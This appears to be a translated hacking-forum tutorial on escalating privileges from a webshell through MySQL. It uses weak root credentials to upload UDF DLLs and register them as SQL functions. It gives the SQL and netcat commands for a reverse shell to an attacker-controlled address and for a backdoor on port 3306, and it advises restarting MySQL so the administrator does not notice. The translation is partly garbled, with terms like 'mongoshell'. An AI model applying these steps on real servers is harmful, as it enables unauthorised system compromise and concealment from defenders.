WEBSHELL Privilege Escalation

Source: Huaxia Hacker Alliance

The S-serv method is used by everyone. As a result, all hosts are configured very securely. It seems that the endless stream of attack methods is also one of the major reasons for China's network security improvement, there are other pcanywhere tools for getting passwords, replacing services, and so on. However, it is not so easy now. With the improvement of security awareness, the previous method is not very useful. Now I will introduce you to a new method of Elevation of Privilege, do anyone who has seen the animation made by classical LM know it? Using the weak password of MYSQLl to obtain system permissions can also be achieved on WEBSHEL, but there is a premise that the target host is equipped with MYSQL, and you know the MYSQL user and password, can be obtained. After WEBSHELL is obtained, it is not difficult to find the user and password. Now I use another machine as an example. I have uploaded PHPSHELL. Generally, the account and password for connecting to MYSQL are very easy to find. I can edit a PHP file and see it.
Now, what should I do if I have the username: root Password: 123456 Database Name: php? Use SQL Query to establish a connection. The connection is successful. Now we can use the following command to escalate the permission: Mix. dll My_udf.dll Upload first. OK, transfer it, Mix. dll is used to rebound the connection. My_udf.dll is a forward connection. You can directly connect to port 3306 of the other party and enter the password to obtain the mongoshell. Well, let's not talk about it. After it is uploaded, execute the following SQL statement create function Mixconnect returns string soname d: \ php \ Mix. dll; to register the function.

The SQL statement is successfully executed!

It's not far from getting mongoshell. We first use NC to listen to a port locally. First, Nc-l-p 1234 (I don't want to use it) and then execute the statement: select Mixconnect (192.168.1.254, 1234); to activate the function, run it successfully, and then check whether our NC has reflected it. The CMSHELL is successfully obtained, but the MYSQL of the other party is suspended, we need to kill the MYSQL service process and restart the MYSQL service. Otherwise, the Administrator will find that the website cannot run .... If the server is not allowed to connect to any external IP address and port, its port 3306 is opened externally! Then My_udf.dll should be on the stage. The method is the same as Mix. After the MYSQL connection is successful, execute the following statement: create function my_udfdoor returns string soname D: \ php \ phpmy_udf.dll; after the statement is successfully executed, then we start to activate this function, input the statement: select my_udfdoor (); then use nc to connect to port 3306, and then enter fuck to get a mongoshell.

OK! The test is over.